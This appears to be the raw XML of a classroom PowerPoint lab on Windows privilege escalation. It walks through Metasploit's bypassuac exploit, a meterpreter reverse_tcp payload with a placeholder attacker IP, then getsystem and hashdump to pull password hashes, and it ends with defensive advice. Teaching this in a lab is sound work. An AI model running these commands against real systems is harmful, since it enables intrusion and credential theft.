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4"/>
  </p:sldMasterIdLst>
  <p:notesMasterIdLst>
    <p:notesMasterId r:id="rId18"/>
  </p:notesMasterIdLst>
  <p:handoutMasterIdLst>
    <p:handoutMasterId r:id="rId19"/>
  </p:handoutMasterIdLst>
  <p:sldIdLst>
    <p:sldId id="256" r:id="rId5"/>
    <p:sldId id="588" r:id="rId6"/>
    <p:sldId id="590" r:id="rId7"/>
    <p:sldId id="615" r:id="rId8"/>
    <p:sldId id="592" r:id="rId9"/>
    <p:sldId id="593" r:id="rId10"/>
    <p:sldId id="594" r:id="rId11"/>
    <p:sldId id="604" r:id="rId12"/>
    <p:sldId id="614" r:id="rId13"/>
    <p:sldId id="610" r:id="rId14"/>
    <p:sldId id="611" r:id="rId15"/>
    <p:sldId id="613" r:id="rId16"/>
    <p:sldId id="58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DBC0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A2A96-D54E-441C-BCB5-37E5F5656AD0}" v="1" dt="2020-03-31T19:41:54.52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3A3A2A96-D54E-441C-BCB5-37E5F5656AD0}"/>
    <pc:docChg chg="custSel delSld modSld">
      <pc:chgData name="Joseph MacAdam" userId="bdcfcd3f-81bf-4584-8271-fe9093ebec4c" providerId="ADAL" clId="{3A3A2A96-D54E-441C-BCB5-37E5F5656AD0}" dt="2020-04-01T11:32:32.706" v="602" actId="20577"/>
      <pc:docMkLst>
        <pc:docMk/>
      </pc:docMkLst>
      <pc:sldChg chg="modSp">
        <pc:chgData name="Joseph MacAdam" userId="bdcfcd3f-81bf-4584-8271-fe9093ebec4c" providerId="ADAL" clId="{3A3A2A96-D54E-441C-BCB5-37E5F5656AD0}" dt="2020-04-01T11:32:02.342" v="575" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="0" sldId="256"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Joseph MacAdam" userId="bdcfcd3f-81bf-4584-8271-fe9093ebec4c" providerId="ADAL" clId="{3A3A2A96-D54E-441C-BCB5-37E5F5656AD0}" dt="2020-04-01T11:32:02.342" v="575" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="0" sldId="256"/>
            <ac:spMk id="131" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="del">
        <pc:chgData name="Joseph MacAdam" userId="bdcfcd3f-81bf-4584-8271-fe9093ebec4c" providerId="ADAL" clId="{3A3A2A96-D54E-441C-BCB5-37E5F5656AD0}" dt="2020-03-31T19:37:57.449" v="305" actId="2696"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3957164049" sldId="591"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="addSp modSp">
        <pc:chgData name="Joseph MacAdam" userId="bdcfcd3f-81bf-4584-8271-fe9093ebec4c" providerId="ADAL" clId="{3A3A2A96-D54E-441C-BCB5-37E5F5656AD0}" dt="2020-04-01T11:32:32.706" v="602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3A3A2A96-D54E-441C-BCB5-37E5F5656AD0}" dt="2020-03-31T19:00:11.722" v="25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3A3A2A96-D54E-441C-BCB5-37E5F5656AD0}" dt="2020-04-01T11:32:32.706" v="602" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3576579015" sldId="594"/>
            <ac:spMk id="3" creationId="{5E2D4D37-B430-4CF2-B9E8-21045B8A2442}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="Joseph MacAdam" userId="bdcfcd3f-81bf-4584-8271-fe9093ebec4c" providerId="ADAL" clId="{3A3A2A96-D54E-441C-BCB5-37E5F5656AD0}" dt="2020-03-31T19:42:07.024" v="569" actId="14861"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3576579015" sldId="594"/>
            <ac:picMk id="4" creationId="{888202B8-B3C0-4B20-8761-0249D2A942BE}"/>
          </ac:picMkLst>
        </pc:picChg>
      </pc:sldChg>
      <pc:sldChg chg="del">
        <pc:chgData name="Joseph MacAdam" userId="bdcfcd3f-81bf-4584-8271-fe9093ebec4c" providerId="ADAL" clId="{3A3A2A96-D54E-441C-BCB5-37E5F5656AD0}" dt="2020-03-31T19:38:09.795" v="310" actId="2696"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="315206133" sldId="595"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="del">
        <pc:chgData name="Joseph MacAdam" userId="bdcfcd3f-81bf-4584-8271-fe9093ebec4c" providerId="ADAL" clId="{3A3A2A96-D54E-441C-BCB5-37E5F5656AD0}" dt="2020-03-31T19:38:01.154" v="308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3A3A2A96-D54E-441C-BCB5-37E5F5656AD0}" dt="2020-03-31T19:38:00.080" v="307" actId="2696"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1444812365" sldId="597"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="del">
        <pc:chgData name="Joseph MacAdam" userId="bdcfcd3f-81bf-4584-8271-fe9093ebec4c" providerId="ADAL" clId="{3A3A2A96-D54E-441C-BCB5-37E5F5656AD0}" dt="2020-03-31T19:38:03.148" v="309" actId="2696"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="194211264" sldId="598"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="del">
        <pc:chgData name="Joseph MacAdam" userId="bdcfcd3f-81bf-4584-8271-fe9093ebec4c" providerId="ADAL" clId="{3A3A2A96-D54E-441C-BCB5-37E5F5656AD0}" dt="2020-03-31T19:38:13.145" v="311" actId="2696"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="817173972" sldId="599"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="del">
        <pc:chgData name="Joseph MacAdam" userId="bdcfcd3f-81bf-4584-8271-fe9093ebec4c" providerId="ADAL" clId="{3A3A2A96-D54E-441C-BCB5-37E5F5656AD0}" dt="2020-03-31T19:38:16.585" v="312" actId="2696"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3971421311" sldId="600"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="modSp">
        <pc:chgData name="Joseph MacAdam" userId="bdcfcd3f-81bf-4584-8271-fe9093ebec4c" providerId="ADAL" clId="{3A3A2A96-D54E-441C-BCB5-37E5F5656AD0}" dt="2020-03-31T19:38:28.701" v="343" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="904304897" sldId="604"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Joseph MacAdam" userId="bdcfcd3f-81bf-4584-8271-fe9093ebec4c" providerId="ADAL" clId="{3A3A2A96-D54E-441C-BCB5-37E5F5656AD0}" dt="2020-03-31T19:38:28.701" v="343" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="904304897" sldId="604"/>
            <ac:spMk id="3" creationId="{B417FD32-F174-4F9B-AC24-75F280513A52}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="del">
        <pc:chgData name="Joseph MacAdam" userId="bdcfcd3f-81bf-4584-8271-fe9093ebec4c" providerId="ADAL" clId="{3A3A2A96-D54E-441C-BCB5-37E5F5656AD0}" dt="2020-03-31T19:38:18.077" v="313" actId="2696"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="883546114" sldId="606"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="del">
        <pc:chgData name="Joseph MacAdam" userId="bdcfcd3f-81bf-4584-8271-fe9093ebec4c" providerId="ADAL" clId="{3A3A2A96-D54E-441C-BCB5-37E5F5656AD0}" dt="2020-03-31T19:37:58.701" v="306" actId="2696"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="708658906" sldId="6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74146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74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1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5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82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317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8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2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8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4E15-4730-4BCC-B088-614340B57A10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76150-2428-45F3-A68B-585699763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2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39D656-8C27-42DB-BADA-3050A965FE0F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Privilege Escalation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7A05-D0A0-4DD0-BE2E-DEF90603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Escalate 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C537-9B4D-4219-AB6F-354EA0BE4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3356891"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2025" dirty="0"/>
              <a:t>Put the process in the background:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1725" b="1" dirty="0">
                <a:latin typeface="Courier"/>
              </a:rPr>
              <a:t>background</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2025" dirty="0"/>
              <a:t>Use the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2025" dirty="0" err="1"/>
              <a:t>bypassuac</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2025" dirty="0"/>
              <a:t> exploit:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1725" b="1" dirty="0">
                <a:latin typeface="Courier"/>
              </a:rPr>
              <a:t>use exploit/windows/local/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1725" b="1" dirty="0" err="1">
                <a:latin typeface="Courier"/>
              </a:rPr>
              <a:t>bypassuac</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1725" b="1" dirty="0">
              <a:latin typeface="Courier"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2025" dirty="0"/>
              <a:t>Show the targets available:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1725" b="1" dirty="0">
                <a:latin typeface="Courier"/>
              </a:rPr>
              <a:t>show targets</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2025" dirty="0"/>
              <a:t>Set the target:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1725" b="1" dirty="0">
                <a:latin typeface="Courier"/>
              </a:rPr>
              <a:t>set target 1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2025" dirty="0"/>
              <a:t>Set the session:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1725" b="1" dirty="0">
                <a:latin typeface="Courier"/>
              </a:rPr>
              <a:t>set session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A91DC-B2A2-44B6-902F-DD2F1B4D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210" y="3139173"/>
            <a:ext cx="3448190" cy="2026691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4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9DE8-A4ED-48E8-ACDE-FECC698D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the Payload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6-828A-4B59-A89A-EB8E7EAF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342630" cy="3097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the payload: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set payload windows/x64/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1">
                <a:latin typeface="Courier" panose="02060409020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>meterpreter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin typeface="Courier" panose="02060409020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1">
                <a:latin typeface="Courier" panose="02060409020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>reverse_tcp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Set the local host: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set LHOST </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2025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Kali_IP_Address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Set the local port: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set LPORT 1717</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Run the exploit: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0B64D-5CDF-4D93-BC31-D01D7544D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46" y="2545002"/>
            <a:ext cx="3379346" cy="258338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58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Privileges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7"/>
            <a:ext cx="4664710" cy="3601223"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2025" dirty="0"/>
              <a:t>You are in the Windows system again</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2025" u="sng" dirty="0"/>
              <a:t>Now</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2025" dirty="0"/>
              <a:t>, check the privileges you have</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1725" dirty="0" err="1">
                <a:latin typeface="Courier"/>
              </a:rPr>
              <a:t>getuid</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1725" dirty="0">
              <a:latin typeface="Courier"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1725" dirty="0" err="1">
                <a:latin typeface="Courier"/>
              </a:rPr>
              <a:t>getsystem</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1725" dirty="0">
              <a:latin typeface="Courier"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1725" dirty="0" err="1">
                <a:latin typeface="Courier"/>
              </a:rPr>
              <a:t>getsystem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1725" dirty="0">
                <a:latin typeface="Courier"/>
              </a:rPr>
              <a:t> -t 1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="1425" dirty="0"/>
              <a:t>What was different running these commands this time?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1725" dirty="0" err="1">
                <a:latin typeface="Courier"/>
              </a:rPr>
              <a:t>hashdump</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1725" dirty="0"/>
              <a:t> (attempts to get hashed passwords)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1125" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="1425" dirty="0"/>
              <a:t>What happens with this command?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DA59E-734D-489A-AC73-C90388AA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84" y="1914524"/>
            <a:ext cx="3623130" cy="2385722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87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w Cen MT"/>
              </a:rPr>
              <a:t>Defend Against Privilege Escalation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4128132"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Privilege escalation is usually the result of a software bug</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>It is imperative that you always update your software and install the latest patches.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Running old, unpatched software is usually asking for trouble.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Firewalls can help too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are some other ways of defending against a Privilege Escalation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 Escalation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 used (from Kali Linux)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Metasploit Framework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lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Objective 1.2 – Compare and Contrast types of attacks</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Application/Service Attacks</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="3"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Privilege Escalation</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Objective 1.4 - Explain penetration testing concepts</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Escalation of privilege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you have explored and understand </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>the following lab.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>This lab makes use of:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Backdoor/Trojan 2 Lab</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="348397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Privilege Escalation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0992"/>
            <a:ext cx="8101065" cy="3667538"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>A privilege escalation attack is when a user gains access to resources that are not supposed to be available to that user</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1950" dirty="0"/>
              <a:t>For example, a student is usually not supposed to have access to the Teachers’ Lounge. However, if they obtained a copy of the key to the room, they could “escalate” their privileges to access the Teachers’ Lounge.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Privilege Escalation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3256"/>
            <a:ext cx="5873750" cy="3667538"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="428625" indent="-428625">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Setup Environments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Initialize Metasploit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Create and install </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>trojan</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/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Play the Victim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Check Privileges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Escalate Privileges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Specify Payload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Check Privileges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Meterpreter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260272" cy="3667538"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>In Kali, have a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>meterpreter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> session open to the</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>target Windows VM</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>For reference, use the Backdoor/Trojan 2 Lab</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Let’s see what system we are dealing with:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>Type </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:latin typeface="Courier"/>
              </a:rPr>
              <a:t>shell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t> to enter the command line</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>Type </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1">
                <a:latin typeface="Courier"/>
              </a:rPr>
              <a:t>systeminfo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t> to find out information about the system</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>What can you find out from this?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>Type </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:latin typeface="Courier"/>
              </a:rPr>
              <a:t>exit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t> to return to the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1"/>
              <a:t>meterpreter</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1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202B8-B3C0-4B20-8761-0249D2A9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45" y="1690689"/>
            <a:ext cx="2675115" cy="137229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4371"/>
            <a:ext cx="4725955" cy="3803309"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2025" dirty="0"/>
              <a:t>Once in the Meterpreter system</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2025" dirty="0"/>
              <a:t>Now, check the privileges you have</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1725" dirty="0" err="1"/>
              <a:t>getuid</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1725" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="1425" dirty="0"/>
              <a:t>Notice you are logged in as “student” (in Windows)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1725" dirty="0" err="1"/>
              <a:t>getsystem</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1725" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="1425" dirty="0"/>
              <a:t>Notice that it tried, but fails because it does not have the proper privileges</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1725" dirty="0" err="1"/>
              <a:t>getsystem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1725" dirty="0"/>
              <a:t> -t 1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="1425" dirty="0"/>
              <a:t>Not enough access again</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1725" dirty="0" err="1"/>
              <a:t>hashdump</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1725" dirty="0"/>
              <a:t> (attempts to get hashed passwords)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1125" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="1425" dirty="0"/>
              <a:t>It should say “Operation failed”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0F96CD-C060-4DD6-A9BA-1B042474A584}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="228600" y="3723696"/>
            <a:ext cx="3886200" cy="94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endParaRPr lang="en-US" sz="165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B8F2C-6D4D-410A-9524-066AE2C0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05" y="1540997"/>
            <a:ext cx="3600282" cy="189308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30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75" dirty="0"/>
              <a:t>We’ve accessed the system but we don’t have access to do whatever we want.</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2475" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2475" dirty="0"/>
              <a:t>Shucks!</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2475" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2475" dirty="0"/>
              <a:t>We’re at a dead end…</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2475" dirty="0"/>
            </a:br>
            <a:endParaRPr lang="en-US" sz="2475" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2475" dirty="0"/>
              <a:t>…or are we?</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2475" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2475" dirty="0"/>
              <a:t>Not if we can escalate our privileges to be an Administrator on the Windows machine!</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="14626933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64DE382E3924D9716985E5EC9DD06" ma:contentTypeVersion="10" ma:contentTypeDescription="Create a new document." ma:contentTypeScope="" ma:versionID="adee4d99a0ef3424d84f2af5ebc03541">
  <xsd:schema xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xs="http://www.w3.org/2001/XMLSchema" xmlns:p="http://schemas.microsoft.com/office/2006/metadata/properties" xmlns:ns3="421edf8b-0c99-44a8-81ee-8c3d4609cca6" xmlns:ns4="24f12f22-2052-46e3-ad3c-52792f2472db" targetNamespace="http://schemas.microsoft.com/office/2006/metadata/properties" ma:root="true" ma:fieldsID="f45b4b2d7a3af1bd4fb33e73469554dd" ns3:_="" ns4:_="">
    <xsd:import namespace="421edf8b-0c99-44a8-81ee-8c3d4609cca6"/>
    <xsd:import namespace="24f12f22-2052-46e3-ad3c-52792f2472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edf8b-0c99-44a8-81ee-8c3d4609c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12f22-2052-46e3-ad3c-52792f2472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F1A304-3901-451F-B5BD-FD4B50969F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F9DFA-5A54-453E-BDD6-7A57FA6B8C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edf8b-0c99-44a8-81ee-8c3d4609cca6"/>
    <ds:schemaRef ds:uri="24f12f22-2052-46e3-ad3c-52792f2472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B3ABB9-AA52-4D39-BFCC-72746F262919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421edf8b-0c99-44a8-81ee-8c3d4609cca6"/>
    <ds:schemaRef ds:uri="24f12f22-2052-46e3-ad3c-52792f2472d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207</TotalTime>
  <Words>575</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>On-screen Show (4:3)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Privilege Escalation Lab</vt:lpstr>
      <vt:lpstr>Objectives Covered</vt:lpstr>
      <vt:lpstr>Pre-requisites</vt:lpstr>
      <vt:lpstr>What is a Privilege Escalation Attack?</vt:lpstr>
      <vt:lpstr>The Privilege Escalation Lab</vt:lpstr>
      <vt:lpstr>Open a Meterpreter Session</vt:lpstr>
      <vt:lpstr>Check Privileges</vt:lpstr>
      <vt:lpstr>Dead end?</vt:lpstr>
      <vt:lpstr>Escalate Privileges</vt:lpstr>
      <vt:lpstr>Specify the Payload (Again)</vt:lpstr>
      <vt:lpstr>Check Privileges (Again)</vt:lpstr>
      <vt:lpstr>Defend Against Privilege Escalation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Joseph MacAdam</dc:creator>
  <cp:lastModifiedBy>Richard Greene</cp:lastModifiedBy>
  <cp:revision>26</cp:revision>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2021-05-18T18:04:42Z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0x01010008364DE382E3924D9716985E5EC9DD06</vt:lpwstr>
  </property>
</Properties>
</file>